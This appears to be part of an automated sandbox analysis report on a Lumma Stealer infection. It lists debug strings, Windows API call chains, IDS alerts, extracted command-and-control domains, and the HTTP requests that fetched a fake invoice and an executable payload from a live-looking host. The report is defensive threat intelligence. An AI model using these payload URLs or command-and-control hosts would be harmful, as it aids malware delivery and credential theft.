            Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: powershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmp, IMAKBWPY.exe, 00000010.00000000.1937547411.00000000009EB000.00000002.00000001.01000000.0000000F.sdmp, IMAKBWPY.exe, 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmp, IMAKBWPY.exe, 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmp, IMAKBWPY.exe, 00000011.00000000.1942070181.000000000027B000.00000002.00000001.01000000.00000011.sdmp, IMAKBWPY.exe.16.dr
            Source: Binary string: explorer.pdbUGP source: explorer.exe, 00000016.00000003.2529304928.0000000005595000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: msvcr90.i386.pdb source: msvcr90.dll.18.dr
            Source: Binary string: mfdvdec.pdbUGP source: cmd.exe, 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2571463926.0000000000366000.00000008.00000001.01000000.00000000.sdmp
            Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000004.00000003.2219075197.000001D04CEAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2219241314.000001D04CEAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221900308.000001D04CD61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2219075197.000001D04CE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2218300920.000001D04CEC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2219486828.000001D04CE72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2247275165.000001D04CD81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2219737128.000001D048DB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2220749210.000001D04CE07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221325270.000001D048DAA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221436947.000001D04CDC5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mfdvdec.pdb source: cmd.exe, 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2571463926.0000000000366000.00000008.00000001.01000000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: pyexec.exe, 00000012.00000002.2156013955.0000000008950000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000012.00000002.2160438736.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2350967507.0000000009021000.00000004.00000001.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349805985.000000000891F000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2350182430.0000000008C70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528670821.0000000004C46000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528981853.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572930085.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572486363.0000000004D27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: pyexec.exe, 00000012.00000002.2156013955.0000000008950000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000012.00000002.2160438736.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2350967507.0000000009021000.00000004.00000001.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349805985.000000000891F000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2350182430.0000000008C70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528670821.0000000004C46000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528981853.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572930085.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572486363.0000000004D27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sethc.pdb source: mshta.exe, 00000004.00000003.2221900308.000001D04CD61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2247275165.000001D04CD81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2220749210.000001D04CE07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221325270.000001D048DAA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221436947.000001D04CDC5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\build27\cpython\PCBuild\python27.pdb source: pyexec.exe, 00000012.00000002.2168401639.000000006C25A000.00000002.00000001.01000000.00000014.sdmp, pyexec.exe, 00000012.00000003.2126299220.000000000906F000.00000004.00000001.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2352385789.000000006BC2A000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: explorer.pdb source: explorer.exe, 00000016.00000003.2529304928.0000000005595000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009A3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,16_2_009A3CC4
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009E4440 FindFirstFileW,FindClose,16_2_009E4440
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009B9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,16_2_009B9B43
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00274440 FindFirstFileW,FindClose,17_2_00274440
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00249B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,17_2_00249B43
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00233CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,17_2_00233CC4
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]17_2_1000DCA0

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49815 -> 104.21.59.81:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49815 -> 104.21.59.81:443
            Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 104.21.59.81 443
            Source: Malware configuration extractorURLs: deafeninggeh.biz
            Source: Malware configuration extractorURLs: diffuculttan.xyz
            Source: Malware configuration extractorURLs: effecterectz.xyz
            Source: Malware configuration extractorURLs: awake-weaves.cyou
            Source: Malware configuration extractorURLs: debonairnukk.xyz
            Source: Malware configuration extractorURLs: immureprech.biz
            Source: Malware configuration extractorURLs: passworoggre.click
            Source: Malware configuration extractorURLs: sordid-snaked.cyou
            Source: Malware configuration extractorURLs: wrathful-jammy.cyou
            Source: global trafficHTTP traffic detected: GET /KlarnaInvoice42611.pdf HTTP/1.1Host: naubeautylus.chConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /IMAKBWPY.exe HTTP/1.1Host: naubeautylus.ch
            Source: Joe Sandbox ViewASN Name: SUB6GB SUB6GB
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49820 -> 104.21.59.81:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49815 -> 104.21.59.81:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 62.182.21.105:443
            Source: global trafficHTTP traffic detected: GET /Headerfrontend HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: naubeautylus.chConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: passworoggre.click
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /Headerfrontend HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: naubeautylus.chConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /KlarnaInvoice42611.pdf HTTP/1.1Host: naubeautylus.chConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /IMAKBWPY.exe HTTP/1.1Host: naubeautylus.ch
            Source: global trafficDNS traffic detected: DNS query: naubeautylus.ch
            Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
            Source: global trafficDNS traffic detected: DNS query: passworoggre.click
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: passworoggre.click
            Source: IMAKBWPY.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
            Source: powershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmp, IMAKBWPY.exe, 00000010.00000000.1937547411.00000000009EB000.00000002.00000001.01000000.0000000F.sdmp, IMAKBWPY.exe, 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmp, IMAKBWPY.exe, 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmp, IMAKBWPY.exe, 00000011.00000000.1942070181.000000000027B000.00000002.00000001.01000000.00000011.sdmp, IMAKBWPY.exe.16.drString found in binary or memory: http://appsyndication.org/2006/appsynapplicationapuputil.cppupgradeexclusivetrueenclosuredigestalgor
            Source: pyexec.exe, 00000013.00000002.2349529322.0000000008735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://c0rl.m%L
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: explorer.exe, 00000016.00000003.2570257382.00000000033C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000003.2570568622.0000000003420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftP
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
            Source: svchost.exe, 00000005.00000002.2998510315.000001EFFC411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: pyexec.exe, 00000012.00000002.2151008989.0000000008783000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349529322.0000000008735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicer
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
            Source: svchost.exe, 00000005.00000003.1807192834.000001EFFC198000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 00000005.00000003.1807192834.000001EFFC198000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 00000005.00000003.1807192834.000001EFFC198000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 00000005.00000003.1807192834.000001EFFC1CD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF00854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://naubeautylus.ch
            Source: powershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: python27.dll.17.drString found in binary or memory: http://python.org/dev/peps/pep-0263/
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://s.symcd.com06
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
            Source: pyexec.exe.17.dr, pyexec.exe.18.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
            Source: powershell.exe, 00000006.00000002.1948905614.000001EF0022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: pyexec.exe, 00000012.00000002.2153513648.000000000889B000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008856000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.000000000511D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
            Source: pyexec.exe, 00000012.00000002.2153513648.0000000008845000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349631887.0000000008800000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528849936.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572772667.00000000050D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
